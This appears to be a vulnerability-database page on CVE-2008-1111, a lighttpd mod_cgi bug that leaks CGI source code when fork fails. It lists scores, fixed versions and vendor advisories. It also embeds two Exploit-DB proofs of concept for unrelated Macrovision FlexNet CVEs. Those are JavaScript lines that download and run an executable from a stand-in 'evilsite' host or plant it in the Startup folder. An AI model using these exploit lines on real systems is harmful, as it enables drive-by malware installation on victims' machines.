CVE-2008-1111
published 2008-03-04CVE-2008-1111: mod_cgi in lighttpd 1.4.18 sends the source code of CGI scripts instead of a 500 error when a fork failure occurs, which might allow remote attackers to obtain…
PriorityP417medium5CVSS 2.0
AVNACLAuNCPINAN
EPSS
2.02%
78.7th percentile
mod_cgi in lighttpd 1.4.18 sends the source code of CGI scripts instead of a 500 error when a fork failure occurs, which might allow remote attackers to obtain sensitive information.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | lighttpd | < lighttpd 1.4.18-4 (bookworm) | lighttpd 1.4.18-4 (bookworm) |
| lighttpd | lighttpd | — | — |
| lighttpd | lighttpd | >= 0 < 1.4.18-4 | 1.4.18-4 |
| lighttpd | lighttpd | >= 0 < 1.4.18-4 | 1.4.18-4 |
| lighttpd | lighttpd | >= 0 < 1.4.18-4 | 1.4.18-4 |
| lighttpd | lighttpd | >= 0 < 1.4.18-4 | 1.4.18-4 |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
osv5.0MEDIUM
vendor_debian5.0LOW
vendor_redhat5.0MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qrp4-26p8-2rmq: mod_cgi in lighttpd 1
ghsa_unreviewed·2022-05-01
CVE-2008-1111 [MEDIUM] CWE-200 GHSA-qrp4-26p8-2rmq: mod_cgi in lighttpd 1
mod_cgi in lighttpd 1.4.18 sends the source code of CGI scripts instead of a 500 error when a fork failure occurs, which might allow remote attackers to obtain sensitive information.
OSV
CVE-2008-1111: mod_cgi in lighttpd 1
osv·2008-03-04·CVSS 5.0
CVE-2008-1111 [MEDIUM] CVE-2008-1111: mod_cgi in lighttpd 1
mod_cgi in lighttpd 1.4.18 sends the source code of CGI scripts instead of a 500 error when a fork failure occurs, which might allow remote attackers to obtain sensitive information.
Debian
CVE-2008-1111: lighttpd - mod_cgi in lighttpd 1.4.18 sends the source code of CGI scripts instead of a 500...
vendor_debian·2008·CVSS 5.0
CVE-2008-1111 [MEDIUM] CVE-2008-1111: lighttpd - mod_cgi in lighttpd 1.4.18 sends the source code of CGI scripts instead of a 500...
mod_cgi in lighttpd 1.4.18 sends the source code of CGI scripts instead of a 500 error when a fork failure occurs, which might allow remote attackers to obtain sensitive information.
Scope: local
bookworm: resolved (fixed in 1.4.18-4)
bullseye: resolved (fixed in 1.4.18-4)
forky: resolved (fixed in 1.4.18-4)
sid: resolved (fixed in 1.4.18-4)
trixie: resolved (fixed in 1.4.18-4)
Red Hat
lighttpd CGI source disclosure
vendor_redhat·CVSS 5.0
CVE-2008-1111 [MEDIUM] lighttpd CGI source disclosure
lighttpd CGI source disclosure
mod_cgi in lighttpd 1.4.18 sends the source code of CGI scripts instead of a 500 error when a fork failure occurs, which might allow remote attackers to obtain sensitive information.
No detection rules found.
Exploit-DB
Macrovision FlexNet - 'isusweb.dll' DownloadAndExecute Method
exploitdb·2008-01-15
CVE-2008-4586 Macrovision FlexNet - 'isusweb.dll' DownloadAndExecute Method
Macrovision FlexNet - 'isusweb.dll' DownloadAndExecute Method
---
Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit
function Check() {
obj.DownloadAndExecute("Bla","{11111111-1111-1111-1111-111111111111}",0,"http://www.evilsite.com/evil.exe","evil.exe");
}
Unable to create object
# milw0rm.com [2008-01-15]
Exploit-DB
Macrovision FlexNet DownloadManager - Insecure Methods
exploitdb·2008-01-14
CVE-2008-4587 Macrovision FlexNet DownloadManager - Insecure Methods
Macrovision FlexNet DownloadManager - Insecure Methods
---
Macrovision FlexNet DownloadManager Insecure Methods Exploit
function Check() {
var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}");
mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\harmless.exe");
mJob.SetPriority(0);
mJob.SetNotifyFlags(2);
mJob.ScheduleInterval = 2;
obj.RunScheduledJobs();
}
Unable to create object
# milw0rm.com [2008-01-14]
http://lists.opensuse.org/opensuse-security-announce/2008-04/msg00005.htmlhttp://secunia.com/advisories/29209http://secunia.com/advisories/29235http://secunia.com/advisories/29268http://secunia.com/advisories/29275http://secunia.com/advisories/29318http://secunia.com/advisories/29622http://security.gentoo.org/glsa/glsa-200803-10.xmlhttp://trac.lighttpd.net/trac/changeset/2107http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0106http://www.debian.org/security/2008/dsa-1513http://www.securityfocus.com/archive/1/489465/100/0/threadedhttp://www.securityfocus.com/bid/28100http://www.vupen.com/english/advisories/2008/0763https://bugs.gentoo.org/show_bug.cgi?id=211956https://exchange.xforce.ibmcloud.com/vulnerabilities/41008https://issues.rpath.com/browse/RPL-2326https://www.redhat.com/archives/fedora-package-announce/2008-March/msg00162.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-March/msg00180.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-04/msg00005.htmlhttp://secunia.com/advisories/29209http://secunia.com/advisories/29235http://secunia.com/advisories/29268http://secunia.com/advisories/29275http://secunia.com/advisories/29318http://secunia.com/advisories/29622http://security.gentoo.org/glsa/glsa-200803-10.xmlhttp://trac.lighttpd.net/trac/changeset/2107http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0106http://www.debian.org/security/2008/dsa-1513http://www.securityfocus.com/archive/1/489465/100/0/threadedhttp://www.securityfocus.com/bid/28100http://www.vupen.com/english/advisories/2008/0763https://bugs.gentoo.org/show_bug.cgi?id=211956https://exchange.xforce.ibmcloud.com/vulnerabilities/41008https://issues.rpath.com/browse/RPL-2326https://www.redhat.com/archives/fedora-package-announce/2008-March/msg00162.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-March/msg00180.html
2008-03-04
Published